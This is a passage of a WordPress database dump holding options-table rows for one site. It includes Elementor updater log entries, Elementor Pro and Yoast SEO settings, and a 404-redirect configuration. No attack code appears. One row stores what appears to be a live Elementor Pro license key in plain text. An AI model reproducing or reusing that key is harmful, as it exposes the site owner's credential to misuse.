Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"14f2fa39945afcda76df5aab8d7aa4e6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:50\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"d163188b7fbc1c2b72e380c2317d9b28\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:51\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:51\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"55a4da355728ffad30be7a13baa282fd\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-08 10:02:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-08 10:02:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"f3a448b7db9e26f6a3001da7d972636f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-08 10:02:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-08 10:02:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"61ebf89d9acef788b7a6ec74aab47e9c\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-08 10:02:32\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-08 10:02:32\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d0670024cfbbd08d90e5c2a28b7458b5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-08 10:02:32\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.5\";s:2:\"to\";s:5:\"4.2.1\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-08 10:02:32\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.5\";s:2:\"to\";s:5:\"4.2.1\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"5389d6445e3dfe45efecc14dc153900e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-08 10:02:36\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.5\";s:2:\"to\";s:5:\"4.2.1\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-08 10:02:36\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.5\";s:2:\"to\";s:5:\"4.2.1\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"03f97dbdf7460f58a52466a77e1655db\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-12 12:51:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-12 12:51:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"05f0ef2b48110b3ab5b293a624c850d6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-12 12:51:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-12 12:51:29\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"6be4138c9669b33e2218632e448e7468\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-12 12:51:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-12 12:51:29\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"afaf60fe46db49f94da4318e5782e026\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-12 12:51:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.1\";s:2:\"to\";s:5:\"4.2.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-12 12:51:29\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.1\";s:2:\"to\";s:5:\"4.2.2\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"2b2432b7bc084009d40aa62c141c1110\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:29\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"9239003adff6b7ee92ccb2e5fb00b8e0\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:39\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:39\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"fbd4c21cddad10d39824129e94006cff\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:39\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:39\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"9c1fdcc482099b975a2ee616bc5f7512\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"e7d4c0613af3186e3057579129839ea5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:40\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"3f2f234f0c1e038b564ee4ab4fbf8d5a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-08-22 06:16:41\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-08-22 06:16:41\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.2\";s:2:\"to\";s:5:\"4.2.3\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"7deb7216838737c84e0f8bd00f1c84e7\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-09-03 15:10:09\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-09-03 15:10:09\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"4556cccff72980cebb66fe70dbc2d3ac\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-09-03 15:10:09\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-09-03 15:10:09\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"334574610d14676919c1c0a60cc3589e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-09-03 15:10:12\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-09-03 15:10:12\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"56fbcb35ae51c95af8fdccab9cf13c39\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-09-03 15:10:12\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.3\";s:2:\"to\";s:5:\"4.2.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-09-03 15:10:12\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.2.3\";s:2:\"to\";s:5:\"4.2.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}}','off'),(1107,'elementor_allow_tracking','yes','auto'),(1108,'elementor_allow_tracking_last_update','1761119349','auto'),(1109,'elementor_tracker_last_send','1788347830','auto'),(1114,'elementor_pro_license_key','ep-xzaQaHG4mqdIYhQGGSwK1721210482yXGty07hTTsB','auto'),(1115,'_elementor_pro_license_v2_data_fallback','a:2:{s:7:\"timeout\";i:1788534385;s:5:\"value\";s:41:\"{\"success\":false,\"error\":\"site_inactive\"}\";}','off'),(1116,'_elementor_pro_license_v2_data','a:2:{s:7:\"timeout\";i:1788491185;s:5:\"value\";s:41:\"{\"success\":false,\"error\":\"site_inactive\"}\";}','off'),(1117,'elementor_notes_db_version','5','auto'),(1122,'_elementor_settings_update_time','1761119348','auto'),(1123,'elementor_cpt_support','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','auto'),(1124,'elementor_disable_color_schemes','','auto'),(1125,'elementor_disable_typography_schemes','','auto'),(1126,'elementor_google_maps_api_key','','auto'),(1127,'elementor_pro_recaptcha_site_key','','auto'),(1128,'elementor_pro_recaptcha_secret_key','','auto'),(1129,'elementor_pro_recaptcha_v3_site_key','','auto'),(1130,'elementor_pro_recaptcha_v3_secret_key','','auto'),(1131,'elementor_pro_recaptcha_v3_threshold','0.5','auto'),(1132,'elementor_pro_facebook_app_id','','auto'),(1133,'elementor_pro_mailchimp_api_key','','auto'),(1134,'elementor_validate_api_data','','auto'),(1135,'elementor_pro_activecampaign_api_key','','auto'),(1136,'elementor_pro_activecampaign_api_url','','auto'),(1137,'elementor_pro_convertkit_api_key','','auto'),(1138,'elementor_pro_drip_api_token','','auto'),(1139,'elementor_pro_getresponse_api_key','','auto'),(1140,'elementor_pro_mailerlite_api_key','','auto'),(1141,'elementor_typekit-kit-id','','auto'),(1143,'elementor_pro_stripe_test_secret_key','','auto'),(1144,'elementor_validate_stripe_api_test_secret_key_button','','auto'),(1145,'elementor_pro_stripe_live_secret_key','','auto'),(1146,'elementor_validate_stripe_api_live_secret_key_button','','auto'),(1147,'elementor_stripe_legal_disclaimer','','auto'),(1148,'elementor_editor_break_lines','','auto'),(1149,'elementor_unfiltered_files_upload','1','auto'),(1150,'elementor_google_font','1','auto'),(1151,'elementor_form-submissions','','auto'),(1152,'elementor_load_fa4_shim','','auto'),(1153,'elementor_meta_generator_tag','','auto'),(1154,'elementor_css_print_method','external','auto'),(1155,'elementor_optimized_image_loading','1','auto'),(1156,'elementor_optimized_gutenberg_loading','1','auto'),(1157,'elementor_lazy_load_background_images','1','auto'),(1158,'elementor_local_google_fonts','0','auto'),(1159,'elementor_element_cache_ttl','24','auto'),(1160,'elementor_experiment-import-export-customization','default','auto'),(1161,'elementor_experiment-container','inactive','auto'),(1162,'elementor_experiment-nested-elements','inactive','auto'),(1163,'elementor_experiment-mega-menu','inactive','auto'),(1164,'elementor_experiment-e_font_icon_svg','default','auto'),(1165,'elementor_experiment-additional_custom_breakpoints','default','auto'),(1166,'elementor_experiment-e_optimized_markup','default','auto'),(1167,'elementor_experiment-theme_builder_v2','default','auto'),(1168,'elementor_experiment-hello-theme-header-footer','default','auto'),(1171,'elementor_font_awesome_pro_kit_id','','auto'),(1172,'elementor_pro_theme_builder_conditions','a:1:{s:6:\"header\";a:1:{i:32;a:1:{i:0;s:15:\"include/general\";}}}','auto'),(1179,'elementor_fonts_manager_font_types','a:0:{}','auto'),(1180,'elementor_fonts_manager_fonts','a:0:{}','auto'),(1181,'elementor_custom_icon_sets_config','a:0:{}','auto'),(1194,'options-404-redirect-group','a:7:{s:16:\"p404_redirect_to\";s:18:\"https://amb18b.com\";s:11:\"p404_status\";s:1:\"1\";s:15:\"img_p404_status\";s:1:\"2\";s:19:\"p404_execlude_media\";s:1:\"1\";s:5:\"links\";i:104334;s:12:\"install_date\";s:19:\"2025-10-22 08:40 am\";s:18:\"p404_redirect_type\";s:3:\"301\";}','auto'),(1195,'P404_email_update','1','auto'),(1196,'p404_migration_status2','2','auto'),(1199,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"28.4\";}','auto'),(1200,'wpseo','a:124:{s:8:\"tracking\";b:0;s:16:\"toggled_tracking\";b:0;s:22:\"license_server_version\";b:0;s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:26:\"permalink_settings_changed\";s:29:\"indexables_indexing_completed\";b:1;s:13:\"index_now_key\";s:0:\"\";s:7:\"version\";s:4:\"28.4\";s:16:\"previous_version\";s:4:\"28.3\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:0;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:12:\"ahrefsverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:34:\"inclusive_language_analysis_active\";b:0;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:16:\"enable_index_now\";b:1;s:19:\"enable_ai_generator\";b:1;s:22:\"ai_enabled_pre_default\";b:0;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1761122490;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:12:\"/%postname%/\";s:8:\"home_url\";s:18:\"https://amb18b.com\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:3:{s:22:\"elementor_library_type\";s:22:\"elementor_library_type\";s:26:\"elementor_library_category\";s:26:\"elementor_library_category\";s:19:\"elementor_font_type\";s:19:\"elementor_font_type\";}s:29:\"enable_enhanced_slack_sharing\";b:1;s:23:\"enable_metabox_insights\";b:1;s:23:\"enable_link_suggestions\";b:1;s:26:\"algolia_integration_active\";b:0;s:14:\"import_cursors\";a:0:{}s:13:\"workouts_data\";a:1:{s:13:\"configuration\";a:1:{s:13:\"finishedSteps\";a:0:{}}}s:28:\"configuration_finished_steps\";a:0:{}s:36:\"dismiss_configuration_workout_notice\";b:0;s:34:\"dismiss_premium_deactivated_notice\";b:0;s:19:\"importing_completed\";a:0:{}s:26:\"wincher_integration_active\";b:1;s:14:\"wincher_tokens\";a:0:{}s:36:\"wincher_automatically_add_keyphrases\";b:0;s:18:\"wincher_website_id\";s:0:\"\";s:18:\"first_time_install\";b:1;s:34:\"should_redirect_after_install_free\";b:0;s:34:\"activation_redirect_timestamp_free\";i:1761122492;s:18:\"remove_feed_global\";b:0;s:27:\"remove_feed_global_comments\";b:0;s:25:\"remove_feed_post_comments\";b:0;s:19:\"remove_feed_authors\";b:0;s:22:\"remove_feed_categories\";b:0;s:16:\"remove_feed_tags\";b:0;s:29:\"remove_feed_custom_taxonomies\";b:0;s:22:\"remove_feed_post_types\";b:0;s:18:\"remove_feed_search\";b:0;s:21:\"remove_atom_rdf_feeds\";b:0;s:17:\"remove_shortlinks\";b:0;s:21:\"remove_rest_api_links\";b:0;s:20:\"remove_rsd_wlw_links\";b:0;s:19:\"remove_oembed_links\";b:0;s:16:\"remove_generator\";b:0;s:20:\"remove_emoji_scripts\";b:0;s:24:\"remove_powered_by_header\";b:0;s:22:\"remove_pingback_header\";b:0;s:28:\"clean_campaign_tracking_urls\";b:0;s:16:\"clean_permalinks\";b:0;s:32:\"clean_permalinks_extra_variables\";s:0:\"\";s:14:\"search_cleanup\";b:0;s:20:\"search_cleanup_emoji\";b:0;s:23:\"search_cleanup_patterns\";b:0;s:22:\"search_character_limit\";i:50;s:20:\"deny_search_crawling\";b:0;s:21:\"deny_wp_json_crawling\";b:0;s:20:\"deny_adsbot_crawling\";b:0;s:19:\"deny_ccbot_crawling\";b:0;s:29:\"deny_google_extended_crawling\";b:0;s:20:\"deny_gptbot_crawling\";b:0;s:27:\"redirect_search_pretty_urls\";b:0;s:29:\"least_readability_ignore_list\";a:0:{}s:27:\"least_seo_score_ignore_list\";a:0:{}s:23:\"most_linked_ignore_list\";a:0:{}s:24:\"least_linked_ignore_list\";a:0:{}s:28:\"indexables_page_reading_list\";a:5:{i:0;b:0;i:1;b:0;i:2;b:0;i:3;b:0;i:4;b:0;}s:25:\"indexables_overview_state\";s:21:\"dashboard-not-visited\";s:28:\"last_known_public_post_types\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:28:\"last_known_public_taxonomies\";a:3:{i:0;s:8:\"category\";i:1;s:8:\"post_tag\";i:2;s:11:\"post_format\";}s:23:\"last_known_no_unindexed\";a:6:{s:31:\"wpseo_unindexed_post_link_count\";i:1788456094;s:31:\"wpseo_unindexed_term_link_count\";i:1788447992;s:40:\"wpseo_total_unindexed_post_type_archives\";i:1788447992;s:35:\"wpseo_total_unindexed_general_items\";i:1788447992;s:27:\"wpseo_total_unindexed_posts\";i:1788447992;s:27:\"wpseo_total_unindexed_terms\";i:1788447992;}s:14:\"new_post_types\";a:0:{}s:14:\"new_taxonomies\";a:0:{}s:34:\"show_new_content_type_notification\";b:0;s:44:\"site_kit_configuration_permanently_dismissed\";b:0;s:18:\"site_kit_connected\";b:0;s:37:\"site_kit_tracking_setup_widget_loaded\";s:3:\"yes\";s:41:\"site_kit_tracking_first_interaction_stage\";s:7:\"install\";s:40:\"site_kit_tracking_last_interaction_stage\";s:7:\"install\";s:52:\"site_kit_tracking_setup_widget_temporarily_dismissed\";s:2:\"no\";s:52:\"site_kit_tracking_setup_widget_permanently_dismissed\";s:2:\"no\";s:31:\"google_site_kit_feature_enabled\";b:0;s:25:\"ai_free_sparks_started_on\";N;s:15:\"enable_llms_txt\";b:0;s:15:\"last_updated_on\";i:1788448194;s:17:\"default_seo_title\";a:3:{i:0;i:436;i:1;i:434;i:2;i:433;}s:21:\"default_seo_meta_desc\";a:3:{i:0;i:436;i:1;i:434;i:2;i:433;}s:18:\"first_activated_by\";i:0;s:34:\"enable_schema_aggregation_endpoint\";b:0;s:38:\"schema_aggregation_endpoint_enabled_on\";N;s:16:\"enable_task_list\";b:1;s:13:\"enable_schema\";b:1;}','auto'),(1201,'wpseo_titles','a:140:{s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:25:\"social-title-author-wpseo\";s:8:\"%%name%%\";s:26:\"social-title-archive-wpseo\";s:8:\"%%date%%\";s:31:\"social-description-author-wpseo\";s:0:\"\";s:32:\"social-description-archive-wpseo\";s:0:\"\";s:29:\"social-image-url-author-wpseo\";s:0:\"\";s:30:\"social-image-url-archive-wpseo\";s:0:\"\";s:28:\"social-image-id-author-wpseo\";i:0;s:29:\"social-image-id-archive-wpseo\";i:0;s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:1;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:2:\"»\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:22:\"company_alternate_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:26:\"open_graph_frontpage_title\";s:12:\"%%sitename%%\";s:25:\"open_graph_frontpage_desc\";s:0:\"\";s:26:\"open_graph_frontpage_image\";s:0:\"\";s:24:\"publishing_principles_id\";i:0;s:25:\"ownership_funding_info_id\";i:0;s:29:\"actionable_feedback_policy_id\";i:0;s:21:\"corrections_policy_id\";i:0;s:16:\"ethics_policy_id\";i:0;s:19:\"diversity_policy_id\";i:0;s:28:\"diversity_staffing_report_id\";i:0;s:15:\"org-description\";s:0:\"\";s:9:\"org-email\";s:0:\"\";s:9:\"org-phone\";s:0:\"\";s:14:\"org-legal-n